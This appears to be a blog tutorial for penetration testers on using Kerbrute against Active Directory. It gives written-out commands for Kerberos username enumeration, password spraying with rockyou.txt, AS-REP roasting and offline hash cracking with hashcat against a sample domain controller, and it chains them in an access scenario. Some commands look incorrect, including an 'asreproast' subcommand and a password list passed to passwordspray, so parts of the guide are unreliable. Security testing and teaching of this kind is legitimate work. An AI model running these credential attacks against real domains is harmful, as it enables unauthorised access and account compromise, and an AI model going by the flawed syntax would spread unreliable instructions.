/ Reconnaissance & Enumeration, Uncategorized / By

Kerbrute for Pentesters: Username Enumeration & Kerberos Attacks

Category: Pentesting Tools & Techniques
Focus: Active Directory, Kerberos, Enumeration

What Is Kerbrute?

Kerbrute is a powerful tool built in Go that helps pentesters interact with the Kerberos protocol to:

  • Enumerate valid usernames
  • Perform password spraying
  • Find accounts vulnerable to AS-REP Roasting

It leverages how Kerberos responds to authentication requests to figure out whether a username is valid or not — without needing any initial access. This makes Kerbrute a pre-auth tool, great for early-stage Active Directory attacks.

When Should You Use Kerbrute?

Kerbrute is most useful during the enumeration and initial access phases of a penetration test, particularly when:

  • You’ve identified a Domain Controller (DC)
  • You know the target domain name
  • You want to confirm valid usernames
  • You want to find roastable accounts (for hash extraction)
  • You want to spray passwords to gain initial access

It’s fast, efficient, and doesn’t require authentication — just a reachable Domain Controller.

Installing Kerbrute

Option 1: Using Go (Manual Build)

# Clone the repo
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute

# Initialize Go modules
go mod tidy

# Build it
go build

# Move the binary to make it global
sudo mv kerbrute /usr/local/bin/

Requires Golang installed. If not, install with sudo apt install golang -y.

Option 2: Precompiled Binary

Download the latest release:
https://github.com/ropnop/kerbrute/releases

Common Use Cases and Commands

1. Enumerate Valid Usernames

Kerberos gives different errors for valid vs invalid usernames. Kerbrute exploits this behavior to enumerate users without a password.

kerbrute userenum -d corp.local --dc 192.168.56.101 usernames.txt
# -d = domain name
# --dc = IP address of Domain Controller
# usernames.txt = list of potential usernames

2. Password Spraying

Try a list of common passwords against known users — very useful for initial access.

kerbrute passwordspray -d corp.local --dc 192.168.56.101 users.txt rockyou.txt
# users.txt = list of valid usernames
# rockyou.txt = list of passwords to try

3. AS-REP Roasting (No Pre-auth Accounts)

Find users who don’t require pre-authentication and dump hashes to crack offline.

kerbrute asreproast -d corp.local --dc 192.168.56.101 users.txt
# Look for vulnerable user accounts (pre-auth disabled)

This will output hashes in hashcat format. Crack them using:

hashcat -m 18200 asrep_hashes.txt rockyou.txt

How It Works (Briefly)

  • Kerberos replies with different messages depending on whether the username exists or not.
  • Kerbrute detects these differences and reports valid accounts.
  • For AS-REP roasting, Kerbrute requests a TGT for users without pre-auth — the DC responds with encrypted data that can be cracked offline.

OPSEC Warning

Kerbrute is noisy:

  • Every request hits the Domain Controller and generates logs.
  • Event ID 4768 (Kerberos TGT request) and 4771 (failed pre-auth) are common.
  • Avoid during stealth ops unless you’ve got permission to be loud.

Real-World Scenario

You found an exposed DC at 192.168.56.101, and the domain is corp.local. You want to:

  1. Find valid usernames: kerbrute userenum -d corp.local --dc 192.168.56.101 users.txt
  2. Try default passwords: kerbrute passwordspray -d corp.local --dc 192.168.56.101 users.txt rockyou.txt
  3. Look for roastable accounts: kerbrute asreproast -d corp.local --dc 192.168.56.101 users.txt

Now you’ve got either a working login or an offline-crackable hash. You’re in business.

Pro Tips

  • Use GetNPUsers.py from Impacket as a follow-up for AS-REP roasting.
  • Combine with userlists from /usr/share/seclists/ or harvested via OSINT.
  • Crack offline hashes with hashcat for stealthier access later.

Related Posts

Scroll to Top